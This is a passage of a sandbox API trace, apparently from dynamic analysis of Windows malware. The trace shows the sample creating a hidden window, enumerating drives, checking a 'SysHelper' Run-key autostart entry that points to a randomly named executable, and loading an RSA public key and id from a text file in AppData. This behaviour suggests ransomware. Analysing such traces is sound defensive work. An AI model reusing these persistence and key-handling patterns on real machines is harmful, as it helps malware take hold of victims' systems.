nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x6011c [0164.165] NtdllDefWindowProc_W () returned 0x0 [0164.165] NtdllDefWindowProc_W () returned 0x1 [0164.167] NtdllDefWindowProc_W () returned 0x0 [0164.170] NtdllDefWindowProc_W () returned 0x0 [0164.170] ShowWindow (hWnd=0x6011c, nCmdShow=0) returned 0 [0164.170] UpdateWindow (hWnd=0x6011c) returned 1 [0164.170] GetLogicalDrives () returned 0x4 [0164.170] SetErrorMode (uMode=0x1) returned 0x0 [0164.170] PathFileExistsA (pszPath="C:\\") returned 1 [0164.170] SetErrorMode (uMode=0x0) returned 0x1 [0164.170] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0164.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x806) returned 0x3acc038 [0164.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dda8, cbMultiByte=-1, lpWideCharStr=0x3acc038, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3acc848 [0164.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3acc038 | out: hHeap=0xcd0000) returned 1 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0xcf6308 [0164.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3acc848 | out: hHeap=0xcd0000) returned 1 [0164.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcf6308 | out: hHeap=0xcd0000) returned 1 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0xcf6308 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fb678 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8ec) returned 0x3acc038 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3acc930 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3aed508 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1070) returned 0x3ac1428 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71998 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3ac24a0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x660) returned 0x3acd148 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3aedd90 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3aee618 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3aeeea0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3aef728 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3aeffb0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3ac2cb8 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3af0838 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3af10c0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3ac3500 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3af8728 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3af8f90 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3af1948 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3af21d0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3af97f8 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3afa040 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3af2a58 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3af32e0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3af3b68 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3af43f0 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3af4c78 [0164.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3afa8a0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3afb128 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3afb9b0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3afc238 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3afcac0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b0a888 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b0b0f0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3afd348 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3afdbd0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3afe458 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b0b958 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b0c1a0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3afece0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3aff568 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3affdf0 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b00678 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b00f00 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b01788 [0164.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b02010 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b02898 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b03120 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b0c9e8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b0d250 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b039a8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b04230 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b04ab8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b0dab8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b05340 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b05bc8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b06450 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b06cd8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b07560 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b07de8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b08670 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b08ef8 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b09780 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b0e318 [0164.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b2ff30 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b30798 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b0eba0 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b0f428 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b0fcb0 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b10538 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b10dc0 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b11648 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b11ed0 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b12758 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b12fe0 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609d50 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b13868 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b31000 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b140f0 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b14978 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b15200 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b15a88 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b16310 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b16b98 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd718c8 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b17420 [0164.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b17ca8 [0164.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b18530 [0164.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b18db8 [0164.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x3acc040, dwCreationFlags=0x0, lpThreadId=0x35fb680 | out: lpThreadId=0x35fb680*=0x324) returned 0x5f4 [0164.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x8f0) returned 0x5f8 [0164.176] GetMessageW (in: lpMsg=0x18dfa0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18dfa0) returned 1 [0173.273] NtdllDefWindowProc_W () returned 0x0 [0173.484] NtdllDefWindowProc_W () returned 0x0 [0173.485] NtdllDefWindowProc_W () returned 0x0 [0173.515] NtdllDefWindowProc_W () returned 0x0 [0173.516] NtdllDefWindowProc_W () returned 0x0 [0173.516] NtdllDefWindowProc_W () returned 0x0 [0173.517] NtdllDefWindowProc_W () returned 0x0 [0173.517] NtdllDefWindowProc_W () returned 0x0 [0173.517] NtdllDefWindowProc_W () returned 0x1 [0173.521] NtdllDefWindowProc_W () returned 0x0 [0173.547] NtdllDefWindowProc_W () returned 0x0 [0173.549] NtdllDefWindowProc_W () returned 0x0 [0173.549] NtdllDefWindowProc_W () returned 0x0 [0173.549] NtdllDefWindowProc_W () returned 0x3 [0173.550] TranslateMessage (lpMsg=0x18dfa0) returned 0 [0173.550] DispatchMessageW (lpMsg=0x18dfa0) returned 0x0 [0173.550] GetMessageW (lpMsg=0x18dfa0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0173.550] NtdllDefWindowProc_W () [0173.550] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18c6b8 | out: phkResult=0x18c6b8*=0x68c) returned 0x0 [0173.550] RegQueryValueExW (in: hKey=0x68c, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18c6b4, lpData=0x18ade0, lpcbData=0x18c698*=0x400 | out: lpType=0x18c6b4*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart", lpcbData=0x18c698*=0xe8) returned 0x0 [0173.551] RegCloseKey (hKey=0x68c) returned 0x0 [0173.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xf0) returned 0x369e940 [0173.551] lstrlenA (lpString="\" --AutoStart") returned 13 [0173.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd0) returned 0x35c4658 [0173.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369e940 | out: hHeap=0xcd0000) returned 1 [0173.551] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned 1 [0173.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c4658 | out: hHeap=0xcd0000) returned 1 [0173.551] IsWindow (hWnd=0x6011c) returned 1 [0173.551] DestroyWindow (hWnd=0x6011c) [0173.551] NtdllDefWindowProc_W () returned 0x0 [0173.552] NtdllDefWindowProc_W () returned 0x1 [0173.553] NtdllDefWindowProc_W () returned 0x0 [0173.553] NtdllDefWindowProc_W () returned 0x0 [0173.553] NtdllDefWindowProc_W () returned 0x0 [0173.553] NtdllDefWindowProc_W () returned 0x0 [0173.554] NtdllDefWindowProc_W () returned 0x0 [0173.554] PostQuitMessage (nExitCode=0) [0174.030] NtdllDefWindowProc_W () returned 0x0 Thread: id = 102 os_tid = 0x5f4 Thread: id = 103 os_tid = 0xa98 Thread: id = 106 os_tid = 0x174 Thread: id = 107 os_tid = 0xa80 Thread: id = 108 os_tid = 0xa84 Thread: id = 109 os_tid = 0x180 Thread: id = 110 os_tid = 0x6d8 Thread: id = 111 os_tid = 0x76c Thread: id = 112 os_tid = 0x340 Thread: id = 113 os_tid = 0x9e0 [0163.827] timeGetTime () returned 0x115872a [0163.827] GetLastError () returned 0x54f [0163.827] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3bc) returned 0x369e688 [0163.827] GetCurrentThreadId () returned 0x9e0 [0163.827] SetLastError (dwErrCode=0x54f) [0163.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x9f5a5e4 | out: phkResult=0x9f5a5e4*=0x364) returned 0x0 [0163.828] RegQueryValueExW (in: hKey=0x364, lpValueName="SysHelper", lpReserved=0x0, lpType=0x9f5a5d8, lpData=0x9f5a5e0, lpcbData=0x9f5a5dc*=0x4 | out: lpType=0x9f5a5d8*=0x4, lpData=0x9f5a5e0*=0x1, lpcbData=0x9f5a5dc*=0x4) returned 0x0 [0163.828] RegCloseKey (hKey=0x364) returned 0x0 [0163.828] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9f5a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.828] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0163.828] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0xcf6348 [0163.828] AreFileApisANSI () returned 1 [0163.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9f5a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0163.828] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7a) returned 0xd2e8c0 [0163.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9f5a4e4, cbMultiByte=-1, lpWideCharStr=0xd2e8c0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0163.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9f5a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0163.829] GetFileType (hFile=0x364) returned 0x1 [0163.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e8c0 | out: hHeap=0xcd0000) returned 1 [0163.829] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x9f5a418 | out: lpNewFilePointer=0x0) returned 1 [0163.829] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x9f5a410 | out: lpNewFilePointer=0x0) returned 1 [0163.829] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x9f593f4 | out: lpNewFilePointer=0x0) returned 1 [0163.829] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x9f593ec | out: lpNewFilePointer=0x0) returned 1 [0163.829] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x9f5a434 | out: lpNewFilePointer=0x0) returned 1 [0163.829] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x9f5a42c | out: lpNewFilePointer=0x0) returned 1 [0163.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1000) returned 0x369ea50 [0163.830] ReadFile (in: hFile=0x364, lpBuffer=0x369ea50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x9f5a3c4, lpOverlapped=0x0 | out: lpBuffer=0x369ea50*, lpNumberOfBytesRead=0x9f5a3c4*=0x22f, lpOverlapped=0x0) returned 1 [0163.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369ea50 | out: hHeap=0xcd0000) returned 1 [0163.830] CloseHandle (hObject=0x364) returned 1 [0163.830] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0163.830] lstrcpyA (in: lpString1=0x9f5ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.830] lstrcpyA (in: lpString1=0x9f5a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.830] lstrlenA (lpString="-----BEGIN PUBLIC 